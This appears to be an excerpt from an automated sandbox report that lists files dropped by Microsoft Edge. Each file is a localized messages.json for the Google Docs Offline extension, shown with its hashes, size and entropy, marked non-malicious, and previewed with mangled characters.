                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
